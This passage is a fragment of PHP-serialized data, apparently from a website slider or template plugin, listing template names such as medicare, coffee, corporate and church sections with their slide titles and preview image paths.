5\";s:3:\"img\";s:30:\"music-band-template/slide5.jpg\";}}s:15:\"restaurant-menu\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"restaurant-menu/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"restaurant-menu/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"restaurant-menu/slide3.jpg\";}}s:16:\"cinematic-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"cinematic-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"cinematic-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"cinematic-slider/slide3.jpg\";}}s:17:\"3d-parallax-cubes\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"3d-parallax-cubes/slide3.jpg\";}}s:13:\"medicare-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"medicare-menu/slide1.jpg\";}}s:15:\"medicare-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"medicare-header/slide1.jpg\";}}s:14:\"medicare-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"medicare-about/slide1.jpg\";}}s:18:\"medicare-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"medicare-highlight/slide1.jpg\";}}s:17:\"medicare-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"medicare-services/slide1.jpg\";}}s:16:\"medicare-doctors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"medicare-doctors/slide1.jpg\";}}s:17:\"medicare-research\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"medicare-research/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"medicare-research/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"medicare-research/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"medicare-research/slide4.jpg\";}}s:18:\"medicare-whychoose\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"medicare-whychoose/slide1.jpg\";}}s:16:\"medicare-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"medicare-contact/slide1.jpg\";}}s:15:\"medicare-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"medicare-footer/slide1.jpg\";}}s:11:\"coffee-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"coffee-menu/slide1.jpg\";}}s:13:\"coffee-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-header/slide1.jpg\";}}s:17:\"coffee-philosophy\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"coffee-philosophy/slide1.jpg\";}}s:12:\"coffee-carte\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"coffee-carte/slide1.jpg\";}}s:13:\"coffee-teaser\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-teaser/slide1.jpg\";}}s:13:\"coffee-findus\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-findus/slide1.jpg\";}}s:13:\"coffee-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"coffee-footer/slide1.jpg\";}}s:17:\"minimal-portfolio\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"minimal-portfolio/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"minimal-portfolio/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"minimal-portfolio/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:28:\"minimal-portfolio/slide4.jpg\";}}s:23:\"minimal-portfolio-modal\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:34:\"minimal-portfolio-modal/slide7.jpg\";}}s:11:\"angled-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"angled-menu/slide1.jpg\";}}s:13:\"angled-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"angled-header/slide1.jpg\";}}s:11:\"angled-news\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"angled-news/slide1.jpg\";}}s:15:\"angled-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"angled-services/slide1.jpg\";}}s:14:\"angled-success\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"angled-success/slide1.jpg\";}}s:13:\"angled-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"angled-footer/slide1.jpg\";}}s:20:\"angled-content-modal\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"angled-content-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:31:\"angled-content-modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:31:\"angled-content-modal/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:31:\"angled-content-modal/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:31:\"angled-content-modal/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:31:\"angled-content-modal/slide6.jpg\";}}s:13:\"big-bold-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"big-bold-menu/slide1.jpg\";}}s:15:\"big-bold-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-bold-header/slide1.jpg\";}}s:16:\"big-bold-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"big-bold-content/slide1.jpg\";}}s:13:\"big-bold-blog\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"big-bold-blog/slide1.jpg\";}}s:18:\"big-bold-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"big-bold-highlight/slide1.jpg\";}}s:15:\"big-bold-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-bold-footer/slide1.jpg\";}}s:7:\"Retouch\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:18:\"Retouch/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:18:\"Retouch/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:18:\"Retouch/slide3.jpg\";}}s:11:\"tech-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"tech-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"tech-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"tech-slider/slide3.jpg\";}}s:11:\"peak-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"peak-header/slide1.jpg\";}}s:10:\"peak-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"peak-about/slide1.jpg\";}}s:14:\"peak-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"peak-portfolio/slide1.jpg\";}}s:11:\"peak-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"peak-footer/slide1.jpg\";}}s:17:\"portfolio-welcome\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"portfolio-welcome/slide1.jpg\";}}s:15:\"portfolio-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"portfolio-about/slide1.jpg\";}}s:21:\"portfolio-works-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"portfolio-works-title/slide1.jpg\";}}s:23:\"portfolio-works-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"portfolio-works-content/slide1.jpg\";}}s:18:\"portfolio-contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"portfolio-contacts/slide1.jpg\";}}s:18:\"App-Studio-Welcome\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"App-Studio-Welcome/slide1.jpg\";}}s:19:\"App-Studio-Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"App-Studio-Services/slide1.jpg\";}}s:16:\"App-Studio-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"App-Studio-About/slide1.jpg\";}}s:19:\"App-Studio-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"App-Studio-Contacts/slide1.jpg\";}}s:14:\"cube-animation\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"cube-animation/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"cube-animation/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"cube-animation/slide3.jpg\";}}s:10:\"basic-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"basic-menu/slide1.jpg\";}}s:12:\"basic-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"basic-header/slide1.jpg\";}}s:13:\"basic-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"basic-content/slide1.jpg\";}}s:14:\"basic-carousel\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"basic-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"basic-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"basic-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"basic-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"basic-carousel/slide5.jpg\";}}s:13:\"basic-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"basic-callout/slide1.jpg\";}}s:10:\"basic-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"basic-grid/slide1.jpg\";}}s:17:\"basic-video-block\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"basic-video-block/slide1.jpg\";}}s:12:\"basic-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"basic-footer/slide1.jpg\";}}s:14:\"basic-lightbox\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"basic-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"basic-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"basic-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:25:\"basic-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:25:\"basic-lightbox/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:25:\"basic-lightbox/slide6.jpg\";}}s:13:\"nature-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"nature-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"nature-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"nature-slider/slide3.jpg\";}}s:11:\"art-gallery\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"art-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:22:\"art-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:22:\"art-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:22:\"art-gallery/slide4.jpg\";}}s:19:\"Construction-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Construction-Header/slide1.jpg\";}}s:17:\"Construction-Home\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Construction-Home/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:28:\"Construction-Home/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:28:\"Construction-Home/slide3.jpg\";}}s:21:\"Construction-Projects\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Projects/slide1.jpg\";}}s:20:\"Construction-History\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Construction-History/slide1.jpg\";}}s:21:\"Construction-Services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Services/slide1.jpg\";}}s:21:\"Construction-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"Construction-Contacts/slide1.jpg\";}}s:21:\"404-Error-Space-Theme\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"404-Error-Space-Theme/slide1.jpg\";}}s:17:\"landing-page-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"landing-page-hero/slide1.jpg\";}}s:21:\"landing-page-features\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"landing-page-features/slide1.jpg\";}}s:20:\"landing-page-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"landing-page-callout/slide1.jpg\";}}s:20:\"landing-page-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"landing-page-content/slide1.jpg\";}}s:25:\"landing-page-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"landing-page-testimonials/slide1.jpg\";}}s:27:\"landing-page-call-to-action\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"landing-page-call-to-action/slide1.jpg\";}}s:17:\"landing-page-help\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"landing-page-help/slide1.jpg\";}}s:19:\"landing-page-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"landing-page-footer/slide1.jpg\";}}s:24:\"landing-page-price-modal\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"landing-page-price-modal/slide1.jpg\";}}s:18:\"energy-drinks-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"energy-drinks-hero/slide1.jpg\";}}s:19:\"energy-drinks-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-about/slide1.jpg\";}}s:21:\"energy-drinks-product\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"energy-drinks-product/slide1.jpg\";}}s:23:\"energy-drinks-product-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"energy-drinks-product-2/slide1.jpg\";}}s:23:\"energy-drinks-product-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"energy-drinks-product-3/slide1.jpg\";}}s:19:\"energy-drinks-order\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-order/slide1.jpg\";}}s:20:\"energy-drinks-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"energy-drinks-footer/slide1.jpg\";}}s:19:\"energy-drinks-modal\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"energy-drinks-modal/slide1.jpg\";}}s:16:\"Corporate-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Corporate-Header/slide1.jpg\";}}s:24:\"Corporate-Welcome-Screen\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"Corporate-Welcome-Screen/slide1.jpg\";}}s:15:\"Corporate-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-About/slide1.jpg\";}}s:19:\"Corporate-Portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"Corporate-Portfolio/slide1.jpg\";}}s:15:\"Corporate-Chart\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-Chart/slide1.jpg\";}}s:14:\"Corporate-News\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";}}s:16:\"Corporate-Hiring\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-News/slide1.jpg\";}}s:22:\"Corporate-Testimonials\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"Corporate-Testimonials/slide3.jpg\";}}s:15:\"Corporate-Store\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Corporate-Store/slide1.jpg\";}}s:17:\"Corporate-Support\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Corporate-Support/slide1.jpg\";}}s:14:\"Corporate-Team\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"Corporate-Team/slide1.jpg\";}}s:33:\"Corporate-Selected-Projects-Title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:44:\"Corporate-Selected-Projects-Title/slide1.jpg\";}}s:27:\"Corporate-Selected-Projects\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:38:\"Corporate-Selected-Projects/slide7.jpg\";}}s:17:\"Corporate-Clients\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Corporate-Clients/slide1.jpg\";}}s:20:\"Corporate-Text-Block\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Corporate-Text-Block/slide1.jpg\";}}s:20:\"Corporate-Mobile-App\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:31:\"Corporate-Mobile-App/slide1.jpg\";}}s:18:\"Corporate-Contacts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Corporate-Contacts/slide1.jpg\";}}s:16:\"Corporate-Footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"Corporate-Footer/slide1.jpg\";}}s:23:\"Corporate-Scroll-To-Top\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"Corporate-Scroll-To-Top/slide1.jpg\";}}s:14:\"geometric-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-menu/slide1.jpg\";}}s:14:\"geometric-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-hero/slide1.jpg\";}}s:14:\"geometric-grid\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"geometric-grid/slide1.jpg\";}}s:15:\"geometric-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"geometric-about/slide1.jpg\";}}s:15:\"geometric-texts\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"geometric-texts/slide1.jpg\";}}s:18:\"geometric-services\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"geometric-services/slide1.jpg\";}}s:17:\"geometric-texts-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"geometric-texts-2/slide1.jpg\";}}s:22:\"geometric-testimonials\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"geometric-testimonials/slide1.jpg\";}}s:16:\"geometric-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"geometric-footer/slide1.jpg\";}}s:18:\"geometric-lightbox\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"geometric-lightbox/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"geometric-lightbox/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"geometric-lightbox/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"geometric-lightbox/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"geometric-lightbox/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:29:\"geometric-lightbox/slide6.jpg\";}}s:11:\"brutal-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"brutal-menu/slide1.jpg\";}}s:11:\"brutal-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:22:\"brutal-hero/slide1.jpg\";}}s:12:\"brutal-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"brutal-about/slide1.jpg\";}}s:16:\"brutal-highlight\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"brutal-highlight/slide1.jpg\";}}s:15:\"brutal-projects\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"brutal-projects/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"brutal-projects/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"brutal-projects/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"brutal-projects/slide4.jpg\";}}s:15:\"brutal-services\";a:4:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"brutal-services/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"brutal-services/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"brutal-services/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:26:\"brutal-services/slide4.jpg\";}}s:14:\"brutal-callout\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"brutal-callout/slide1.jpg\";}}s:13:\"brutal-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"brutal-footer/slide1.jpg\";}}s:13:\"Church-Header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"Church-Header/slide1.jpg\";}}s:22:\"Church-Upcoming-Events\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"Church-Upcoming-Events/slide3.jpg\";}}s:12:\"Church-About\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 